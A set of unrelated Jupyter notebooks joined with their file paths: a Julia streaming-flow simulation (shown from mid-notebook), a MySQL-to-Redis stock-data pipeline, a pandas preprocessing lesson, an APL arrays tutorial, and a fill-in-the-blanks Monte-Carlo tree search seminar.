plot(xg,yg,ω₂,levels=range(-5,5,length=30),color=:RdBu,clim=(-5,5))
plot!(body)
# Compute the average vorticity field over a period, $\overline{w}_2$
iplot = length(w2hist)
itr = iplot-floor(Int,2π/(Ω*Δt))+1:iplot
w2avg = average(w2hist,itr)
ω̄₂ = vorticity(w2avg,sys)
ψ̄₂ = streamfunction(w2avg,sys);
ψ̄₂exfield = Nodes(Fields.Dual,w₀)
ψ̄₂exfield .= [ψ̄₂ex(x,y) for x in xg, y in yg];
plot(xg,yg,ψ̄₂,levels=range(-0.2,0.1,length=31),clim=(1,2),xlim=(0,4),ylim=(0,4))
#plot!(xg,yg,ψ̄₂exfield,levels=range(-0.2,0.1,length=31),clim=(-2,-2),xlim=(0,4),ylim=(0,4))
plot!(body,fillcolor=:black,linecolor=:black)
sqrt(xg[119]^2+yg[119]^2)
ig = 120
plot(sqrt.(xg[ig:end].^2+yg[ig:end].^2),map(i -> ψ̄₂[i,i],ig:length(xg)),ylim=(-1,1),xlim=(1,5),label="DNS",xlabel="r")
plot!(sqrt.(xg[ig:end].^2+yg[ig:end].^2),map((x,y) -> ψ̄₂ex(x,y),xg[ig:end],yg[ig:end]),label="Analytical",grid=:true)
sampij = (240,240) # indices of sample point
xg, yg = coordinates(w₀,sys.grid)
xeval = xg[sampij[1]]
yeval = yg[sampij[2]]
reval = sqrt(xeval^2+yeval^2)
ω₂hist = vorticity_history(sampij,w2hist,sys);
plot(thist,ω₂hist,label="DNS",ylim=(-30,30))
plot!(thist,ω₂ex(xeval,yeval,thist),label="Analytical")
xuedge, yuedge, xvedge, yvedge = coordinates(Edges(Primal,w₀),sys.grid)
xeval = xuedge[sampij[1]]
yeval = yuedge[sampij[2]]
reval = sqrt(xeval^2+yeval^2)
u₂hist, v₂hist = velocity_history(sampij,w2hist,sys);
plot(thist,u₂hist,ylim=(-2,2),label="DNS")
plot!(thist,u₂ex(xeval,yeval,thist),xlim=(0,8π),label="Analytical")
plot(thist,v₂hist,ylim=(-2,2),label="DNS")
plot!(thist,v₂ex(xeval,yeval,thist),xlim=(0,8π),label="Analytical")
iplot = 380
println("Time/period = ",thist[iplot]/(2π))
usamp = (w1hist[iplot],w2hist[iplot],dX1hist[iplot],dX2hist[iplot],X̂hist[iplot])
rhs1samp = TimeMarching.r₁(usamp,thist[iplot])
rhs2samp = TimeMarching.r₂(usamp,thist[iplot]);
# #### The right-hand side of the second-order constraint equation
θ = range(0,2π,length=length(coords.u)+1)
plot(θ[1:end-1],rhs2samp[2].u,xlim=(0,2π),ylim=(-2,2),label="DNS",xlabel="θ")
plot!(θ[1:end-1],map((x,y) -> u₂ex(x,y,thist[iplot]),cos.(θ[1:end-1]),sin.(θ[1:end-1])),label="Analytical")
plot!(θ[1:end-1],rhs2samp[2].v,xlim=(0,2π),ylim=(-2,2),label="DNS",xlabel="θ")
plot!(θ[1:end-1],map((x,y) -> v₂ex(x,y,thist[iplot]),cos.(θ[1:end-1]),sin.(θ[1:end-1])),label="Analytical")
# #### History of RHS of second-order equation at sample point
sampij = (240,240) # indices of sample point
xg, yg = coordinates(w₀,sys.grid)
xeval = xg[sampij[1]]
yeval = yg[sampij[2]]
reval = sqrt(xeval^2+yeval^2)
coseval = xeval/reval
sineval = yeval/reval
sin2eval = 2*sineval*coseval
reval
rhshist = nl_history(sampij,w1hist,sys);
itr = length(thist)-floor(Int,2π/(Ω*Δt))+1:length(thist)
println("Mean value of DNS-computed RHS = ",Statistics.mean(rhshist[itr]))
println("Mean value analytical RHS = ",real(f₀(reval)/p.Re*sin2eval))
plot(thist,rhshist,label="DNS")
plot!(thist,real.(f₀(reval)/p.Re .+ g₀(reval)/p.Re*exp.(-2im*thist))*sin2eval,label="Analytical")
# #### Compute the drift streamfunction
#
# $\psi_d = \frac{1}{2} \overline{v_1 \times \Delta X_1}$
itr = length(thist)-floor(Int,2π/(Ω*Δt))+1:length(thist)
vx = zero(w₀)
vy = zero(w₀)
Xx = zero(w₀)
Xy = zero(w₀)
ψd = zero(w₀)
ψdhist = []
for (i,dX) in enumerate(dX1hist)
cellshift!((vx,vy),curl(sys.L\w1hist[i])) # -v₁, on the dual nodes
cellshift!((Xx,Xy),dX) # ΔX₁, on the dual nodes
ψd .= rmul!(Xx∘vy-Xy∘vx,0.5) # 0.5(v₁ × ΔX₁)
push!(ψdhist,ψd)
end
ψd .= average(ψdhist,itr);
# #### Plot the streamlines of the average
xg,yg = coordinates(w₀,sys.grid)
ψ̄₂d = deepcopy(ψ̄₂)
ψ̄₂d .+= ψd
plot(xg,yg,ψ̄₂d,levels=range(-0.2,0.1,length=31),clim=(1,2),xlim=(0,4),ylim=(0,4))
#plot!(xg,yg,ψ̄₂exfield,levels=range(-0.5,0.5,length=31),clim=(-2,-2),xlim=(0,4),ylim=(0,4))
plot!(body,fillcolor=:black,linecolor=:black)
|
examples/Streaming flow.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# ## Building a Jupyter + MySQL + Redis Data Pipeline
#
# This requires running the **Full Stack** which uses the https://github.com/jay-johnson/sci-pype/blob/master/full-stack-compose.yml to deploy three docker containers on the same host:
#
# - MySQL (https://hub.docker.com/r/jayjohnson/schemaprototyping/)
# - Jupyter (https://hub.docker.com/r/jayjohnson/jupyter/)
# - Redis (https://hub.docker.com/r/jayjohnson/redis-single-node/)
#
# 
#
# ### Overview
#
# Here is how it works:
#
# 1. Extract and Transform the IBM pricing data
# - Extract the IBM stock data from the MySQL dataset and store it as a csv inside the **/opt/work/data/src/ibm.csv** file
# 1. Load the IBM pricing data with Pandas
# 1. Plot the pricing data with Matlab
# 1. Publish the Pandas Dataframe as JSON to Redis
# 1. Retrieve the Pandas Dataframe from Redis
# 1. Test the cached pricing data exists outside the container with:
# ```
# $ ./redis.sh
# SSH-ing into Docker image(redis-server)
# [root@redis-server container]# redis-cli -h localhost -p 6000
# localhost:6000> LRANGE LATEST_IBM_DAILY_STICKS 0 0
# 1) "(dp0\nS'Data'\np1\nS'{\"Date\":{\"49\":971136000000,\"48\":971049600000,\"47\":970790400000,\"46\":970704000000,\"45\":970617600000,\"44\":970531200000,\"43\":970444800000,\"42\":970185600000,\"41\":970099200000,\"40\":970012800000,\"39\":969926400000,\"38\":969
#
# ... removed for docs ...
#
# localhost:6000> exit
# [root@redis-server container]# exit
# exit
# $
# ```
#
# +
import os, sys, json, datetime
sys.path.insert(0, os.getenv('ENV_PYTHON_SRC_DIR', '/opt/work/src'))
from pycore import PyCore
# shell printing allows just lg('show log')
from common.shellprinting import *
from logger.logger import Logger
data_dir = os.getenv('ENV_DATA_SRC_DIR', '/opt/work/data/src')
ticker = 'IBM'
days_back = 10000 # all sticks in the db
output_file = str(data_dir) + '/' + ticker.lower() + '.csv'
def db_extract_stock_records(core, ticker, days_back, output_file):
try:
# Most of the SQLAlchemy methods have required some form of these lines
# So I added all of them here for making it easier to just include them all:
from sqlalchemy import Column, Integer, String, ForeignKey, Table, create_engine, MetaData, Date, DateTime, Float, Boolean, cast, or_, and_, asc, desc
from sqlalchemy.orm import relationship, backref, scoped_session, sessionmaker, relation
from sqlalchemy.ext.declarative import declarative_base
# import that custom schema files
from databases.schema.db_schema_stocks import BT_Stocks
# Determine the dates based off the parameters:
right_now = datetime.datetime.now()
end_date_str = right_now
start_date_str = right_now - datetime.timedelta(days=days_back)
lg('Extracting Stock(' + str(ticker) + ') DaysBack(' + str(days_back) + ') Output(' + str(output_file) + ') Dates[' + str(start_date_str) + ' - ' + str(end_date_str) + ']', 6)
# Extract the records that match by the Symbol and are within the date range
# then order them by descending order:
db_recs = core.m_dbs['STOCKS'].m_session.query(BT_Stocks).filter(and_( \
BT_Stocks.Symbol == str(ticker).upper(), \
(cast(BT_Stocks.Date, DateTime) >= start_date_str), \
(end_date_str >= cast(BT_Stocks.Date, DateTime)) )) \
.order_by(desc(BT_Stocks.id)) \
.limit(50) \
.all()
if os.path.exists(output_file):
os.system('rm -f ' + str(output_file))
# end of if there is something to remove before creating a new version
lg('Stock(' + str(ticker) + ') TotalRecords(' + str(len(db_recs)) + ')', 6)
with open(output_file, 'w') as csv_file:
csv_file.write('Date,Open,High,Low,Close,Volume\n')
total_recs = len(db_recs)
for idx,rec in enumerate(db_recs):
if idx % 100 == 0:
lg('Percent(' + str(core.get_percent_done(idx, total_recs)) + ') Rec(' + str(idx) + '/' + str(total_recs) + ')', 6)
# end of if need to print records
# Convert to strings:
date_str = rec.Date.strftime('%d-%b-%y')
open_str = '%0.2f' % float(rec.Open)
high_str = '%0.2f' % float(rec.High)
low_str = '%0.2f' % float(rec.Low)
close_str = '%0.2f' % float(rec.Close)
volume_str = str(int(rec.Volume))
# build the csv line string
line_str = str(date_str) \
+ ',' + str(open_str) \
+ ',' + str(high_str) \
+ ',' + str(low_str) \
+ ',' + str(close_str) \
+ ',' + str(volume_str)
# Write the csv line to the file with a newline character:
csv_file.write(line_str + '\n')
# end of all records
lg('Done Writing(' + str(total_recs) + ') Output(' + str(output_file) + ')', 6)
# end of writing output file
except Exception as e:
lg('ERROR: Failed to extract Stock(' + str(ticker) + ') Records with Ex(' + str(e) + ')', 0)
# end of try/ex
# end of db_extract_stock_records
# Specify to connect the core to the redis server
# running inside the container and listening on port 6000
os.environ['ENV_DEPLOYMENT_TYPE'] = 'Test'
# Initialize the core that will connect to the other containers
core = PyCore()
# Extract and transform the records into a csv file
db_extract_stock_records(core, ticker, days_back, output_file)
if os.path.exists(output_file):
lg('Success File exists: ' + str(output_file), 5)
lg('')
lg('--------------------------------------------', 2)
lg('')
csv_file = output_file
lg('Processing ' + str(ticker) + ' data stored in CSV(' + str(csv_file) + ')', 6)
# Start loading the data
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# %matplotlib inline
import numpy as np
lg('Reading CSV with Pandas')
# handle date formats and the special tab-character on the header row with utf-8-sig
dateparse = lambda x: pd.datetime.strptime(x, '%d-%b-%y')
data = pd.read_csv(csv_file, parse_dates=[0], date_parser=dateparse, encoding='utf-8-sig') \
.sort_values(by='Date', ascending=False)
lg('')
lg('Data Head with Sticks(' + str(len(data)) + ')', 1)
print data.head()
lg('', 6)
lg('-------------------------------------------------', 2)
lg('Creating Ticker(' + str(ticker) + ') Plot by Close Prices', 2)
lg('', 6)
# Set the size of the figure
plt.rcParams['figure.figsize'] = (15.0, 10.0)
all_dates = data.columns.values[0]
all_highs = data.columns.values[2]
all_closes = data.columns.values[4]
lg('Plotting the Data X-axis(' + str(all_dates) + ') Y-axis(' + str(all_closes) + ')', 5)
# Plot lines by referencing the dataframe keys
fig, ax = plt.subplots()
max_cell = len(data['Date']) - 1
start_date = str(data['Date'][0].strftime('%Y-%M-%d'))
end_date = str(data['Date'][max_cell].strftime('%Y-%M-%d'))
ax.set_title(ticker + ' Pricing from ' + str(start_date) + ' to ' + str(end_date))
plt.plot(data['Date'], data['High'], color='red', label='High')
plt.plot(data['Date'], data['Low'], color='green', label='Low')
plt.plot(data['Date'], data['Close'], color='blue', label='Close')
plt.plot(data['Date'], data['Open'], color='orange', label='Open')
# Now add the legend with some customizations.
legend = ax.legend(loc='upper left', shadow=True, bbox_to_anchor=(0, 1.0))
# The frame is matplotlib.patches.Rectangle instance surrounding the legend.
frame = legend.get_frame()
frame.set_facecolor('0.90')
lg('', 6)
lg('-------------------------------------------------', 2)
lg('', 6)
# connect the core to the redis cache if it exists
cache_key = 'LATEST_' + ticker + '_DAILY_STICKS'
lg('Converting to JSON')
json_data_rec = data.to_json()
cache_this = {
'Ticker' : ticker,
'Data' : json_data_rec
}
lg('Caching the Ticker(' + ticker + ') Candlesticks')
results = core.purge_and_cache_records_in_redis(core.m_rds['CACHE'], cache_key, cache_this)
lg('')
lg('-------------------------------------------------', 2)
lg('')
# confirm we can retrieve the cached data without removing it from the cache:
lg('Retrieving Cached Ticker(' + ticker + ') Candlesticks')
cache_record = core.get_cache_from_redis(core.m_rds['CACHE'], cache_key)
lg('')
# the core will return a dictionary where the 'Status' == 'SUCCESS' when it was able to pull records
# records out of redis. After checking the 'Status', the dataset is stored under the 'Record' key.
if cache_record['Status'] == 'SUCCESS':
rec = cache_record['Record']
cache_data = rec['Data']
sticks = pd.read_json(cache_data).sort_values(by='Date', ascending=False)
lg(' - SUCCESS found cached records for Ticker(' + str(rec['Ticker']) + ')', 5)
lg('')
lg(' - Data Head with Sticks(' + str(len(sticks)) + ')')
print sticks.head()
else:
lg('ERROR: Failed to retreive Cached Candlesticks', 0)
# end of retrieving cache example
lg('')
else:
lg('Failed to Extract File', 0)
# did the extraction work or not
|
examples/example-db-extract-and-cache.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# ---
# + [markdown] origin_pos=0
# # Data Preprocessing
# :label:`sec_pandas`
#
# So far we have introduced a variety of techniques for manipulating data that are already stored in tensors.
# To apply deep learning to solving real-world problems,
# we often begin with preprocessing raw data, rather than those nicely prepared data in the tensor format.
# Among popular data analytic tools in Python, the `pandas` package is commonly used.
# Like many other extension packages in the vast ecosystem of Python,
# `pandas` can work together with tensors.
# So, we will briefly walk through steps for preprocessing raw data with `pandas`
# and converting them into the tensor format.
# We will cover more data preprocessing techniques in later chapters.
#
# ## Reading the Dataset
#
# As an example, we begin by creating an artificial dataset that is stored in a
# csv (comma-separated values) file `../data/house_tiny.csv`. Data stored in other
# formats may be processed in similar ways.
#
# Below we write the dataset row by row into a csv file.
#
# + origin_pos=1 tab=["mxnet"]
import os
os.makedirs(os.path.join('..', 'data'), exist_ok=True)
data_file = os.path.join('..', 'data', 'house_tiny.csv')
with open(data_file, 'w') as f:
f.write('NumRooms,Alley,Price\n') # Column names
f.write('NA,Pave,127500\n') # Each row represents a data example
f.write('2,NA,106000\n')
f.write('4,NA,178100\n')
f.write('NA,NA,140000\n')
# + [markdown] origin_pos=2
# To load the raw dataset from the created csv file,
# we import the `pandas` package and invoke the `read_csv` function.
# This dataset has four rows and three columns, where each row describes the number of rooms ("NumRooms"), the alley type ("Alley"), and the price ("Price") of a house.
#
# + origin_pos=3 tab=["mxnet"]
# If pandas is not installed, just uncomment the following line:
# # !pip install pandas
import pandas as pd
data = pd.read_csv(data_file)
print(data)
# + [markdown] origin_pos=4
# ## Handling Missing Data
#
# Note that "NaN" entries are missing values.
# To handle missing data, typical methods include *imputation* and *deletion*,
# where imputation replaces missing values with substituted ones,
# while deletion ignores missing values. Here we will consider imputation.
#
# By integer-location based indexing (`iloc`), we split `data` into `inputs` and `outputs`,
# where the former takes the first two columns while the latter only keeps the last column.
# For numerical values in `inputs` that are missing, we replace the "NaN" entries with the mean value of the same column.
#
# + origin_pos=5 tab=["mxnet"]
inputs, outputs = data.iloc[:, 0:2], data.iloc[:, 2]
inputs = inputs.fillna(inputs.mean())
print(inputs)
# + [markdown] origin_pos=6
# For categorical or discrete values in `inputs`, we consider "NaN" as a category.
# Since the "Alley" column only takes two types of categorical values "Pave" and "NaN",
# `pandas` can automatically convert this column to two columns "Alley_Pave" and "Alley_nan".
# A row whose alley type is "Pave" will set values of "Alley_Pave" and "Alley_nan" to 1 and 0.
# A row with a missing alley type will set their values to 0 and 1.
#
# + origin_pos=7 tab=["mxnet"]
inputs = pd.get_dummies(inputs, dummy_na=True)
print(inputs)
# + [markdown] origin_pos=8
# ## Conversion to the Tensor Format
#
# Now that all the entries in `inputs` and `outputs` are numerical, they can be converted to the tensor format.
# Once data are in this format, they can be further manipulated with those tensor functionalities that we have introduced in :numref:`sec_ndarray`.
#
# + origin_pos=9 tab=["mxnet"]
from mxnet import np
X, y = np.array(inputs.values), np.array(outputs.values)
X, y
# + [markdown] origin_pos=12
# ## Summary
#
# * Like many other extension packages in the vast ecosystem of Python, `pandas` can work together with tensors.
# * Imputation and deletion can be used to handle missing data.
#
#
# ## Exercises
#
# Create a raw dataset with more rows and columns.
#
# 1. Delete the column with the most missing values.
# 2. Convert the preprocessed dataset to the tensor format.
#
# + [markdown] origin_pos=13 tab=["mxnet"]
# [Discussions](https://discuss.d2l.ai/t/28)
#
|
d2l-en/mxnet/chapter_preliminaries/pandas.ipynb
|
# -*- coding: utf-8 -*-
# Throughout this lesson there are snippets of code as examples. You are encouraged to edit and experiment with these – it will greatly improve your understanding.
#
# All data in APL resides in arrays. An array is a rectangular collection of numbers, characters and arrays, arranged along zero or more axes. Numbers and characters are 0 dimensional arrays, and are referred to as scalars. Characters are in single quotes.
#
# Creating a 1-dimensional array is very simple: just write the elements next to each other, separated by spaces. This syntax works for any data that you want in the array: numbers, characters, other arrays (etc.)
#
# A string is just a character vector, which may be written with single quotes around the entire string.
#
# Parentheses are used to group array items.
#
2 3 5 7 11
'A' 'P' 'L'
'APL'
(1 4 2) (4 3) (99 10)
# Numbers are very straight forward: a number is a number. It doesn't matter if it is an integer or not, nor if it is real or complex. Negative numbers are denoted by a 'high minus': `¯`. You can also use scientific notation with `e` (or `E`), so a million is `1E6`
#
# The items of an array can be of different types.
'Hello' 100 (1 'b' 2.5)
¯2 3e2 2e¯1
# An array has a rank and a depth.
# ## Depth
#
# The depth is the level of nesting. For example an array of simple (i.e. non-nested) scalars has depth 1, an array containing only depth 1 arrays has depth 2 and a simple scalar (e.g a number or character) has depth 0. However, for some arrays it's not so easy. An array may contain both vectors and scalars. In cases like this, the depth is reported as negative.
#
# You can find the depth of an array with the function `≡`.
≡ 1
≡ 'APL'
≡ ((1 2) (3 7)) ((99 12) (1 2 3) 'Hey')
≡ 1 'Hello' 33 'World'
# ## Rank
#
# The concept of rank is very important in APL, and isn't present in many other languages. It refers to the number of dimensions in the array. So far, we've only seen rank 0 arrays (scalars), and rank 1 arrays (vectors). You can, however, have arrays of other ranks. A rank 2 array, for example, is often called a matrix or a table.
#
# Arrays are always rectangular; each row of a matrix must have the same number of columns. Each layer of a 3D block must have the same number of rows and columns. As our screens are only two-dimensional, higher rank arrays are printed layer-by-layer.
#
# Creating arrays of ranks greater than 1 is only slightly harder than creating vectors. To do so we can use the function `⍴` (Greek letter "rho" for **r**eshape). It takes a vector of dimension lengths as a left argument and any array as a right argument. It returns a new array with the specified dimensions, filled with the data of the right argument. If there is too much data, the tail just doesn't get used. If there is too little, it gets recycled from the beginning.
2 2⍴1 2 3 4
2 3 2⍴1 0 0 1 1 1 0 1 1 0 0 1
3⍴5 4 3 2 1
3 4⍴'abc'
# It doesn't matter what the rank of the right argument of `⍴` is:
4 5⍴(3 4⍴'ABC')
# Matrices don't have to contain only scalars. Like vectors (and all other arrays), they can be nested.
3 2⍴(1 2)(3 4)(5 6)
2 2⍴(3 2⍴'x')(2 1⍴(2 2⍴0)(2 2⍴1))
# Depth is general to arrays of any rank. The depth of an array isn't just the nesting level of vectors, as shown previously, but of any array. So an array of depth-1 matrices has depth 2, and a matrix of numeric vectors also has depth 2. A matrix of scalars will have depth 1, like any array of scalars.
≡ (5 3⍴1 4 3 7)
≡ (2 2⍴0) (3 1 4⍴11)
≡ (7 7 7⍴(2 2⍴0) 'abc')
# Of course, all arrays of uneven depths are dealt with in the same way as vectors.
≡ (2 2⍴('APL' 360) 1 2)
# The depth of the previous example is `¯3` because the `'A'` in `'APL'` is at a depth of 3 and the depth of the array is uneven.
# APL also has empty arrays: `⍬` is the empty numeric array and `''` is the empty character array.
#
# The function `⍴` also has a meaning monadically, when applied to only one argument. It returns the shape of its argument - the lengths of its dimensions.
⍴ 'abcd'
⍴ (2 2 ⍴ 1 2 3 4)
⍴ ⍬
⍴ ''
# There is a distinction between single row matrices and vectors, even if they look the same when printed.
1 3⍴1 2 3
⍴ (1 3⍴1 2 3)
⍴ 1 2 3
# Note the identity: `X ≡ ⍴ (X ⍴ A)`. After reshaping an array with `X`, it's shape will always be `X`.
# The length of the shape of an array is equal to its rank. Therefore, we can find the rank of an array with `⍴⍴` - The shape of the shape.
#
# Since a scalar is rank 0 (i.e it has no dimensions) the shape of a scalar has length 0 and is an empty vector: `⍬`
⍴⍴ 'abc'
⍴⍴ (3 4 2 5⍴42)
⍴⍴ 'q'
⍴ 'b'
# You can use `⍴` to convert between a rank-0 scalar and a rank-1 vector. A scalar has shape `⍬` and a length 1 vector has shape `1`.
⍴⍴ (1⍴10)
⍴⍴ (⍬⍴(1⍴10))
|
Arrays.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
import gym
import numpy as np
import matplotlib.pyplot as plt
# %matplotlib inline
# ## Seminar: Monte-carlo tree search
#
# In this seminar, we'll implement a vanilla MCTS planning and use it to solve some Gym envs.
#
# But before we do that, we first need to modify gym env to allow saving and loading game states to facilitate backtracking.
# +
from gym.core import Wrapper
from pickle import dumps,loads
from collections import namedtuple
#a container for get_result function below. Works just like tuple, but prettier
ActionResult = namedtuple("action_result",("snapshot","observation","reward","is_done","info"))
class WithSnapshots(Wrapper):
"""
Creates a wrapper that supports saving and loading environemnt states.
Required for planning algorithms.
This class will have access to the core environment as self.env, e.g.:
- self.env.reset() #reset original env
- self.env.ale.cloneState() #make snapshot for atari. load with .restoreState()
- ...
You can also use reset, step and render directly for convenience.
- s, r, done, _ = self.step(action) #step, same as self.env.step(action)
- self.render(close=True) #close window, same as self.env.render(close=True)
"""
def get_snapshot(self):
"""
:returns: environment state that can be loaded with load_snapshot
Snapshots guarantee same env behaviour each time they are loaded.
Warning! Snapshots can be arbitrary things (strings, integers, json, tuples)
Don't count on them being pickle strings when implementing MCTS.
Developer Note: Make sure the object you return will not be affected by
anything that happens to the environment after it's saved.
You shouldn't, for example, return self.env.
In case of doubt, use pickle.dumps or deepcopy.
"""
self.render() #close popup windows since we can't pickle them
if self.unwrapped.viewer is not None:
self.unwrapped.viewer.close()
self.unwrapped.viewer = None
return dumps(self.env)
def load_snapshot(self,snapshot):
"""
Loads snapshot as current env state.
Should not change snapshot inplace (in case of doubt, deepcopy).
"""
assert not hasattr(self,"_monitor") or hasattr(self.env,"_monitor"), "can't backtrack while recording"
self.render(close=True) #close popup windows since we can't load into them
self.env = loads(snapshot)
def get_result(self,snapshot,action):
"""
A convenience function that
- loads snapshot,
- commits action via self.step,
- and takes snapshot again :)
:returns: next snapshot, next_observation, reward, is_done, info
Basically it returns next snapshot and everything that env.step would have returned.
"""
<your code here load,commit,take snapshot>
return ActionResult(<next_snapshot>, #fill in the variables
<next_observation>,
<reward>, <is_done>, <info>)
# -
# ### try out snapshots:
#
# +
#make env
env = WithSnapshots(gym.make("CartPole-v0"))
env.reset()
n_actions = env.action_space.n
# +
print("initial_state:")
plt.imshow(env.render('rgb_array'))
#create first snapshot
snap0 = env.get_snapshot()
# +
#play without making snapshots (faster)
while True:
is_done = env.step(env.action_space.sample())[2]
if is_done:
print("Whoops! We died!")
break
print("final state:")
plt.imshow(env.render('rgb_array'))
plt.show()
# +
#reload initial state
env.load_snapshot(snap0)
print("\n\nAfter loading snapshot")
plt.imshow(env.render('rgb_array'))
plt.show()
# +
#get outcome (snapshot, observation, reward, is_done, info)
res = env.get_result(snap0,env.action_space.sample())
snap1, observation, reward = res[:3]
#second step
res2 = env.get_result(snap1,env.action_space.sample())
# -
# # MCTS: Monte-Carlo tree search
#
# In this section, we'll implement the vanilla MCTS algorithm with UCB1-based node selection.
#
# We will start by implementing the `Node` class - a simple class that acts like MCTS node and supports some of the MCTS algorithm steps.
#
# This MCTS implementation makes some assumptions about the environment, you can find those _in the notes section at the end of the notebook_.
assert isinstance(env,WithSnapshots)
class Node:
""" a tree node for MCTS """
#metadata:
parent = None #parent Node
value_sum = 0. #sum of state values from all visits (numerator)
times_visited = 0 #counter of visits (denominator)
def __init__(self,parent,action,):
"""
Creates and empty node with no children.
Does so by commiting an action and recording outcome.
:param parent: parent Node
:param action: action to commit from parent Node
"""
self.parent = parent
self.action = action
self.children = set() #set of child nodes
#get action outcome and save it
res = env.get_result(parent.snapshot,action)
self.snapshot,self.observation,self.immediate_reward,self.is_done,_ = res
def is_leaf(self):
return len(self.children)==0
def is_root(self):
return self.parent is None
def get_mean_value(self):
return self.value_sum / self.times_visited if self.times_visited !=0 else 0
def ucb_score(self,scale=10,max_value=1e100):
"""
Computes ucb1 upper bound using current value and visit counts for node and it's parent.
:param scale: Multiplies upper bound by that. From hoeffding inequality, assumes reward range to be [0,scale].
:param max_value: a value that represents infinity (for unvisited nodes)
"""
if self.times_visited == 0:
return max_value
#compute ucb-1 additive component (to be added to mean value)
#hint: you can use self.parent.times_visited for N times node was considered,
# and self.times_visited for n times it was visited
U = <your code here>
return self.get_mean_value() + scale*U
#MCTS steps
def select_best_leaf(self):
"""
Picks the leaf with highest priority to expand
Does so by recursively picking nodes with best UCB-1 score until it reaches the leaf.
"""
if self.is_leaf():
return self
children = self.children
best_child = <select best child node in terms of node.ucb_score()>
return best_child.select_best_leaf()
def expand(self):
"""
Expands the current node by creating all possible child nodes.
Then returns one of those children.
"""
assert not self.is_done, "can't expand from terminal state"
for action in range(n_actions):
self.children.add(Node(self,action))
return self.select_best_leaf()
def rollout(self,t_max=10**4):
"""
Play the game from this state to the end (done) or for t_max steps.
On each step, pick action at random (hint: env.action_space.sample()).
Compute sum of rewards from current state till
Note 1: use env.action_space.sample() for random action
Note 2: if node is terminal (self.is_done is True), just return 0
"""
#set env into the appropriate state
env.load_snapshot(self.snapshot)
obs = self.observation
is_done = self.is_done
<your code here - rollout and compute reward>
return rollout_reward
def propagate(self,child_value):
"""
Uses child value (sum of rewards) to update parents recursively.
"""
#compute node value
my_value = self.immediate_reward + child_value
#update value_sum and times_visited
self.value_sum+=my_value
self.times_visited+=1
#propagate upwards
if not self.is_root():
self.parent.propagate(my_value)
def safe_delete(self):
"""safe delete to prevent memory leak in some python versions"""
del self.parent
for child in self.children:
child.safe_delete()
del child
class Root(Node):
def __init__(self,snapshot,observation):
"""
creates special node that acts like tree root
:snapshot: snapshot (from env.get_snapshot) to start planning from
:observation: last environment observation
"""
self.parent = self.action = None
self.children = set() #set of child nodes
#root: load snapshot and observation
self.snapshot = snapshot
self.observation = observation
self.immediate_reward = 0
self.is_done=False
@staticmethod
def from_node(node):
"""initializes node as root"""
root = Root(node.snapshot,node.observation)
#copy data
copied_fields = ["value_sum","times_visited","children","is_done"]
for field in copied_fields:
setattr(root,field,getattr(node,field))
return root
# ## Main MCTS loop
#
# With all we implemented, MCTS boils down to a trivial piece of code.
# +
def plan_mcts(root,n_iters=10):
"""
builds tree with monte-carlo tree search for n_iters iterations
:param root: tree node to plan from
:param n_iters: how many select-expand-simulate-propagete loops to make
"""
for _ in range(n_iters):
node = <select best leaf>
if node.is_done:
node.propagate(0)
else: #node is not terminal
<expand-simulate-propagate loop>
# -
# ## Plan and execute
# In this section, we use the MCTS implementation to find optimal policy.
root_observation = env.reset()
root_snapshot = env.get_snapshot()
root = Root(root_snapshot,root_observation)
#plan from root:
plan_mcts(root,n_iters=1000)
# +
from IPython.display import clear_output
from itertools import count
from gym.wrappers import Monitor
total_reward = 0 #sum of rewards
test_env = loads(root_snapshot) #env used to show progress
for i in count():
#get best child
best_child = <select child with highest mean reward>
#take action
s,r,done,_ = test_env.step(best_child.action)
#show image
clear_output(True)
plt.title("step %i"%i)
plt.imshow(test_env.render('rgb_array'))
plt.show()
total_reward += r
if done:
print("Finished with reward = ",total_reward)
break
#discard unrealized part of the tree [because not every child matters :(]
for child in root.children:
if child != best_child:
child.safe_delete()
#declare best child a new root
root = Root.from_node(best_child)
assert not root.is_leaf(), "We ran out of tree! Need more planning! Try growing tree right inside the loop."
#you may want to expand tree here
#<your code here>
# -
# ### Submit to Coursera
# +
from submit import submit_mcts
submit_mcts(total_reward, <EMAIL>, <TOKEN>)
# -
# ## More stuff
#
# There's a few things you might want to try if you want to dig deeper:
#
# ### Node selection and expansion
#
# "Analyze this" assignment
#
# UCB-1 is a weak bound as it relies on a very general bounds (Hoeffding Inequality, to be exact).
# * Try playing with alpha. The theoretically optimal alpha for CartPole is 200 (max reward).
# * Use using a different exploration strategy (bayesian UCB, for example)
# * Expand not all but several random actions per `expand` call. See __the notes below__ for details.
#
# The goal is to find out what gives the optimal performance for `CartPole-v0` for different time budgets (i.e. different n_iter in plan_mcts.
#
# Evaluate your results on `AcroBot-v1` - do the results change and if so, how can you explain it?
#
#
# ### Atari-RAM
#
# "Build this" assignment
#
# Apply MCTS to play atari games. In particular, let's start with ```gym.make("MsPacman-ramDeterministic-v0")```.
#
# This requires two things:
# * Slightly modify WithSnapshots wrapper to work with atari.
#
# * Atari has a special interface for snapshots:
# ```
# snapshot = self.env.ale.cloneState()
# ...
# self.env.ale.restoreState(snapshot)
# ```
# * Try it on the env above to make sure it does what you told it to.
#
# * Run MCTS on the game above.
# * Start with small tree size to speed-up computations
# * You will probably want to rollout for 10-100 steps (t_max) for starters
# * Consider using discounted rewards (see __notes at the end__)
# * Try a better rollout policy
#
#
# ### Integrate learning into planning
#
# Planning on each iteration is a costly thing to do. You can speed things up drastically if you train a classifier to predict which action will turn out to be best according to MCTS.
#
# To do so, just record which action did the MCTS agent take on each step and fit something to [state, mcts_optimal_action]
# * You can also use optimal actions from discarded states to get more (dirty) samples. Just don't forget to fine-tune without them.
# * It's also worth a try to use P(best_action|state) from your model to select best nodes in addition to UCB
# * If your model is lightweight enough, try using it as a rollout policy.
#
# While CartPole is glorious enough, try expanding this to ```gym.make("MsPacmanDeterministic-v0")```
# * See previous section on how to wrap atari
#
# * Also consider what [AlphaGo Zero](https://deepmind.com/blog/alphago-zero-learning-scratch/) did in this area.
#
# ### Integrate planning into learning
